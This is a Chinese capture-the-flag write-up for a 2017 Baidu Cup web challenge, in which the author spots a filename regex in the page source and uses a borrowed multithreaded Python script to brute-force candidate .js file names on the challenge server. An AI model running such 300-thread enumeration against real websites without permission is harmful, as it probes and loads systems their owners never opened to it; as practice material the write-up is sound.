百度杯2017年春秋欢乐赛-------------象棋

=============================

个人收获：

1.审查网页元素要仔细

 

=============================

 

题目：

 

 

抓包的时候看到一些奇怪的信息

 

在审查元素的时候发现这个

很明显是一个正则表达式，猜测应该就是flag文件的位置了

flag的文件名称是由【abcmlyx】的其中2位+ctf+【0-9】的其中3位数字.js组成

 

那么这里就需要爆破，挨个尝试看看，倒是是哪个名字

 

这里我就拿下别人的python脚本

 

import requests
import threading
import queue
from queue import Queue


def text():
    url = 'http://f290ba2e5a2748c4851a87161a5f123c202c0ff2dccd467a.game.ichunqiu.com/js/'
    strs = 'abcmlyx'
    num = '0123456789'
    for i in strs:
        for j in strs:
            for h in num:
                for l in num:
                    for n in num:
                       new_url = url+i+j+'ctf'+h+l+n+'.js'
                       q.put(new_url)
                       
                       
def requ():
    while not q.empty():
        u = q.get(True, 1)
        try:
            r = requests.get(u).text
            if '404' not in r:
                print(r)
            q.task_done()
        except:
            q.put(u)

if __name__=='__main__':
    q = Queue()
    text()
    for each in range(300):
        t = threading.Thread(target=requ)
        t.daemon = True
        t.start()
        
    q.join()